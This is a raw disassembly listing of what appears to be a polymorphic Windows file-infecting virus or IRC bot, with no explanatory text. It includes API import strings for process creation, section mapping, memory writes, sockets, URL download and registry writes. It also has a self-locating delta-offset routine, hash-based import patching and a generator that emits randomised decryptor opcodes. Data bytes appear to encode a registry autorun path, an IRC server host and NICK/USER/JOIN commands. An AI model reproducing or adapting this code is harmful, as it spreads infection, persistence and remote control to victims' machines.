aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
db 4Eh ; N
db 74h, 4Fh, 70h
db 65h ; e
db 6Eh, 50h, 72h
db 0E9h ; é
db 0Fh, 2 dup(0)
aStoken db 'sToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_3144D527 proc near ; CODE XREF: sub_3144D55E+70�p
; sub_3144D55E+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_3144D527 endp
; =============== S U B R O U T I N E =======================================
sub_3144D55E proc near ; CODE XREF: sub_3144CD29+3F3�p
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_3144D60A
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_3144D60A
mov ecx, [ebp+401588h]
jecxz short loc_3144D5C2
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_3144D5C2: ; CODE XREF: sub_3144D55E+56�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_3144D527
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_3144D527
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_3144D527
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_3144D60A
lea ecx, [edi+23F5h]
call sub_3144D527
loc_3144D60A: ; CODE XREF: sub_3144D55E+16�j
; sub_3144D55E+4E�j ...
mov eax, edi
pop edi
retn
sub_3144D55E endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_3144D6EF proc near ; CODE XREF: sub_3144DF5A+1B�p
; sub_3144E0D2+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_3144D6EF endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 8F7255F0h
dd 6F7270D0h, 2E6D6978h, 67637269h, 78616C61h, 6C702E79h
dd 43494E00h, 7169204Bh, 746C6F76h, 550A726Ch, 20524553h
dd 3032306Fh, 20313035h, 202E202Eh, 4F4A2D3Ah, 26204E49h
dd 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_3144DA09
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_3144D9D6: ; CODE XREF: UPX2:loc_3144DA05�j
lodsb
cmp al, 2Eh
jnz short loc_3144DA05
cmp word ptr [esi], 1DFFh
jnz short loc_3144DA05
lea edi, [ebp+403640h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_3144DA05: ; CODE XREF: UPX2:3144D9D9�j
; UPX2:3144D9E0�j
loop loc_3144D9D6
jmp short loc_3144DA4C
; ---------------------------------------------------------------------------
loc_3144DA09: ; CODE XREF: UPX2:3144D9CB�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_3144DA4C
call near ptr loc_3144DA29+1
push ebx
inc esi
inc ebx
loc_3144DA29: ; CODE XREF: UPX2:3144DA21�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_3144DA4C: ; CODE XREF: UPX2:3144DA07�j
; UPX2:3144DA1F�j
call sub_3144CDA7
dec dword ptr [ebp+401303h]
call near ptr loc_3144DA66+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3144DA66: ; CODE XREF: UPX2:3144DA57�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
dd 359C95FFh, 68930040h, 4, 18EDB58Dh, 8D590040h, 40362CBDh
dd 0F6D6E800h, 0C766FFFFh, 401D6785h, 83F0FF00h, 401D69A5h
dd 958D0000h, 401D27h, 16A5450h, 6852006Ah, 80000002h
dd 363095FFh, 0C0850040h, 8D22755Ah, 401D5A8Dh, 66A5200h
dd 1D67B58Dh, 56540040h, 52515050h, 363495FFh, 0FF580040h
dd 40362C95h, 4D85C600h, 4038h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 9C95FF00h, 93004035h, 768h, 44B58D00h, 59004018h
dd 35FCBD8Dh, 51E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 359C95FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 1882B58Dh, 8D590040h, 403618BDh, 0F61AE800h, 0BD83FFFFh
dd 40361Ch, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4035FC95h, 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h
dd 85004036h, 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h
dd 69BD83E2h, 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h
dd 6A010040h, 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h
dd 112h, 65958D93h, 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h
dd 0F285h, 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh
dd 5E000000h, 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh
dd 1B10040h, 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh
dd 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h
dd 0CC48300h, 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h
dd 40361095h, 247C8D00h, 95FF5714h, 403558h, 0A3804C6h
dd 50006A40h, 95FF5357h, 403610h, 0BD8DE603h, 401DA2h
dd 0C68006Ah, 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h
dd 40364Eh, 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h
dd 83004036h, 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h
dd 601075AEh, 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h
dd 8DCE2BCFh, 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh
dd 0BD800040h, 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h
dd 40384Dh, 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 10A61429h
dd 30C78404h, 4FD479EDh, 10A61413h, 40375248h, 3AAB5957h
dd 0F8C4A684h, 27B1FAE5h, 1A73C17Eh, 6299AD47h, 606EF96Ah
dd 0C26CCC5Ch, 0D8B8B352h, 13h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3144DEA4 proc near ; CODE XREF: sub_3144DEEB:loc_3144DF48�p
; sub_3144DFAB+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3144DEC0: ; CODE XREF: sub_3144DEA4+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3144DEE2
cmp eax, [edx+8]
jnb short loc_3144DEE2
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_3144DEE7
; ---------------------------------------------------------------------------
loc_3144DEE2: ; CODE XREF: sub_3144DEA4+23�j
; sub_3144DEA4+28�j
add edx, 28h
loop loc_3144DEC0
loc_3144DEE7: ; CODE XREF: sub_3144DEA4+3C�j
popa
retn 4
sub_3144DEA4 endp
; =============== S U B R O U T I N E =======================================
sub_3144DEEB proc near ; CODE XREF: UPX2:3144E217�p
; UPX2:3144E23D�p
mov [ebp+4022F7h], al
call sub_3144DF5A
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3144DF02: ; CODE XREF: sub_3144DEEB+1E�j
cmp [eax], ebx
jz short loc_3144DF12
add eax, 4
loop loc_3144DF02
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3144DF12: ; CODE XREF: sub_3144DEEB+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3144DF2C
loc_3144DF1C: ; CODE XREF: sub_3144DEEB+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3144DF1C
mov [ebp+402224h], ebx
loc_3144DF2C: ; CODE XREF: sub_3144DEEB+2F�j
; sub_3144DF5A+34�j
cmp dword ptr [edx], 0
jz short loc_3144DF36
sub esi, [edx]
add esi, [edx+10h]
loc_3144DF36: ; CODE XREF: sub_3144DEEB+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3144DF45
push dword ptr [edx]
jmp short loc_3144DF48
; ---------------------------------------------------------------------------
loc_3144DF45: ; CODE XREF: sub_3144DEEB+54�j
push dword ptr [edx+10h]
loc_3144DF48: ; CODE XREF: sub_3144DEEB+58�j
call sub_3144DEA4
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3144DEEB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144DF5A proc near ; CODE XREF: sub_3144DEEB+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3144DFAB
mov eax, [ebp+40398Eh]
call sub_3144D6EF
call sub_3144DF97
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3144DF90
mov [ebp+4022A0h], ebx
jmp short loc_3144DF2C
; ---------------------------------------------------------------------------
loc_3144DF90: ; CODE XREF: sub_3144DF5A+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3144DF5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144DF97 proc near ; CODE XREF: sub_3144DF5A+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3144DFAB
xor ecx, ecx
retn
sub_3144DF97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144DFAB proc near ; CODE XREF: sub_3144DF5A+10�p
; sub_3144DF97+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3144DEA4
add edx, [ebp+4039AAh]
add edx, esi
loc_3144DFBF: ; CODE XREF: sub_3144DFAB+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3144E0D0
cmp dword ptr [edx+10h], 0
jz locret_3144E0D0
mov eax, [edx+0Ch]
push eax
call sub_3144DEA4
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3144DFE5: ; CODE XREF: sub_3144DFAB+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3144E005
cmp cl, 2Eh
jz short loc_3144DFF4
loc_3144DFF1: ; CODE XREF: sub_3144DFAB+58�j
inc eax
jmp short loc_3144DFE5
; ---------------------------------------------------------------------------
loc_3144DFF4: ; CODE XREF: sub_3144DFAB+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3144DFF1
loc_3144E005: ; CODE XREF: sub_3144DFAB+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3144E0C8
cmp word ptr [eax-2], 3233h
jnz loc_3144E0C8
push esi
cmp dword ptr [edx], 0
jnz short loc_3144E028
mov ecx, [edx+10h]
jmp short loc_3144E02A
; ---------------------------------------------------------------------------
loc_3144E028: ; CODE XREF: sub_3144DFAB+76�j
mov ecx, [edx]
loc_3144E02A: ; CODE XREF: sub_3144DFAB+7B�j
add esi, ecx
push ecx
call sub_3144DEA4
add esi, [ebp+4039AAh]
loc_3144E038: ; CODE XREF: sub_3144DFAB+90�j
; sub_3144DFAB+117�j
lodsd
test eax, eax
js short loc_3144E038
jz loc_3144E0C7
push dword ptr [ebp+4039AAh]
push eax
call sub_3144DEA4
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3144E064: ; CODE XREF: sub_3144DFAB+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3144E07B
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3144E064
; ---------------------------------------------------------------------------
loc_3144E07B: ; CODE XREF: sub_3144DFAB+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3144E0C1
cmp ebx, 0DB6E45A8h
jz short loc_3144E0C1
cmp ebx, 0FFA13B59h
jz short loc_3144E0C1
cmp ebx, 0ACB522D6h
jz short loc_3144E0C1
cmp ebx, 0F358E993h
jz short loc_3144E0C1
cmp ebx, 0F358E97Dh
jz short loc_3144E0C1
cmp ebx, 0E1253F46h
jz short loc_3144E0C1
cmp ebx, 0E1253F30h
jz short loc_3144E0C1
call dword ptr [ebp+403992h]
loc_3144E0C1: ; CODE XREF: sub_3144DFAB+D6�j
; sub_3144DFAB+DE�j ...
pop ebx
jmp loc_3144E038
; ---------------------------------------------------------------------------
loc_3144E0C7: ; CODE XREF: sub_3144DFAB+92�j
pop esi
loc_3144E0C8: ; CODE XREF: sub_3144DFAB+60�j
; sub_3144DFAB+6C�j
add edx, 14h
jmp loc_3144DFBF
; ---------------------------------------------------------------------------
locret_3144E0D0: ; CODE XREF: sub_3144DFAB+18�j
; sub_3144DFAB+22�j
retn
sub_3144DFAB endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_3144E0D2 proc near ; CODE XREF: UPX2:3144E210�p
; UPX2:3144E236�p
push 4
pop eax
call sub_3144D6EF
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_3144D6EF
add edx, 8
xchg edx, ecx
loc_3144E0FA: ; CODE XREF: sub_3144E0D2:loc_3144E139�j
push 5
pop eax
call sub_3144D6EF
cmp dl, 3
jnb short loc_3144E112
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3144E139
; ---------------------------------------------------------------------------
loc_3144E112: ; CODE XREF: sub_3144E0D2+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3144E133
mov al, 11h
call sub_3144D6EF
mov eax, 1
loc_3144E127: ; CODE XREF: sub_3144E0D2+5D�j
test dl, dl
jz short loc_3144E138
shl eax, 1
dec dl
jmp short loc_3144E127
; ---------------------------------------------------------------------------
jmp short loc_3144E138
; ---------------------------------------------------------------------------
loc_3144E133: ; CODE XREF: sub_3144E0D2+47�j
mov eax, 80000000h
loc_3144E138: ; CODE XREF: sub_3144E0D2+57�j
; sub_3144E0D2+5F�j
stosd
loc_3144E139: ; CODE XREF: sub_3144E0D2+3E�j
loop loc_3144E0FA
retn
sub_3144E0D2 endp
; ---------------------------------------------------------------------------
loc_3144E13C: ; CODE XREF: sub_3144EB96+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3144E151
mov al, 60h
stosb
loc_3144E151: ; CODE XREF: UPX2:3144E14C�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3144E257
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EECE8D15h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3144E1CF
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3144E19A
mov eax, 2E8B6467h
loc_3144E19A: ; CODE XREF: UPX2:3144E193�j
stosd
mov ax, 0
stosw
jz short loc_3144E1A6
mov al, 5Dh
stosb
loc_3144E1A6: ; CODE XREF: UPX2:3144E1A1�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3144E1CD
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3144E1CD
mov eax, 0F8ED83h
loc_3144E1CD: ; CODE XREF: UPX2:3144E1B5�j
; UPX2:3144E1C6�j
stosd
dec edi
loc_3144E1CF: ; CODE XREF: UPX2:3144E182�j
test dword ptr [ebp+403431h], 3
jz short loc_3144E1DF
mov al, 0E9h
stosb
stosd
loc_3144E1DF: ; CODE XREF: UPX2:3144E1D9�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3144E257
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3144E0D2
mov al, 20h
call sub_3144DEEB
jecxz short loc_3144E257
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3144E24A
call sub_3144E0D2
mov al, 1Fh
call sub_3144DEEB
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3144E24A: ; CODE XREF: UPX2:3144E234�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3144E257: ; CODE XREF: UPX2:3144E15B�j
; UPX2:3144E1F6�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3144E275
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3144E275: ; CODE XREF: UPX2:3144E261�j
test dword ptr [ebp+403431h], 8
jnz short loc_3144E2CB
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3144E2CB
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3144E2C9
mov al, 49h
stosb
mov ax, 0FC75h
loc_3144E2C9: ; CODE XREF: UPX2:3144E2C0�j
stosw
loc_3144E2CB: ; CODE XREF: UPX2:3144E27F�j
; UPX2:3144E288�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3144E2EC
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3144E2EC: ; CODE XREF: UPX2:3144E2E1�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3144E2FF
add ah, 28h
loc_3144E2FF: ; CODE XREF: UPX2:3144E2FA�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_3144E323
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3144E323: ; CODE XREF: UPX2:3144E318�j
test dword ptr [ebp+403431h], 80h
jnz short loc_3144E33A
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3144E377
; ---------------------------------------------------------------------------
loc_3144E33A: ; CODE XREF: UPX2:3144E32D�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_3144E34C
mov al, 29h
loc_3144E34C: ; CODE XREF: UPX2:3144E348�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_3144E36F
mov ah, 0C8h
loc_3144E36F: ; CODE XREF: UPX2:3144E36B�j
or ah, [ebp+40342Ah]
stosw
loc_3144E377: ; CODE XREF: UPX2:3144E338�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_3144E3FB
test dword ptr [ebp+403431h], 400h
jnz short loc_3144E3A6
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_3144E3F3
; ---------------------------------------------------------------------------
loc_3144E3A6: ; CODE XREF: UPX2:3144E399�j
test dword ptr [ebp+403431h], 800h
jnz short loc_3144E3C3
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3144E3D8
; ---------------------------------------------------------------------------
loc_3144E3C3: ; CODE XREF: UPX2:3144E3B0�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3144E3D8: ; CODE XREF: UPX2:3144E3C1�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_3144E3EB
add ah, 8
loc_3144E3EB: ; CODE XREF: UPX2:3144E3E6�j
or ah, [ebp+40342Bh]
stosw
loc_3144E3F3: ; CODE XREF: UPX2:3144E3A4�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_3144E3FB: ; CODE XREF: UPX2:3144E38D�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_3144E410
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3144E410: ; CODE XREF: UPX2:3144E405�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_3144E420
add al, 4
loc_3144E420: ; CODE XREF: UPX2:3144E41C�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_3144E43D
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3144E43D: ; CODE XREF: UPX2:3144E434�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_3144E44F
mov ah, 29h
loc_3144E44F: ; CODE XREF: UPX2:3144E44B�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_3144E46D
mov al, 86h
loc_3144E46D: ; CODE XREF: UPX2:3144E469�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_3144E481
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3144E481: ; CODE XREF: UPX2:3144E478�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3144E498
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3144E4A7
; ---------------------------------------------------------------------------
loc_3144E498: ; CODE XREF: UPX2:3144E48B�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3144E4A7: ; CODE XREF: UPX2:3144E496�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_3144E4E2
test dword ptr [ebp+403431h], 40000h
jnz short loc_3144E4D9
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3144E4E1
; ---------------------------------------------------------------------------
loc_3144E4D9: ; CODE XREF: UPX2:3144E4BD�j
mov al, 40h
or al, [ebp+40342Bh]
loc_3144E4E1: ; CODE XREF: UPX2:3144E4D7�j
stosb
loc_3144E4E2: ; CODE XREF: UPX2:3144E4B1�j
test dword ptr [ebp+403431h], 80000h
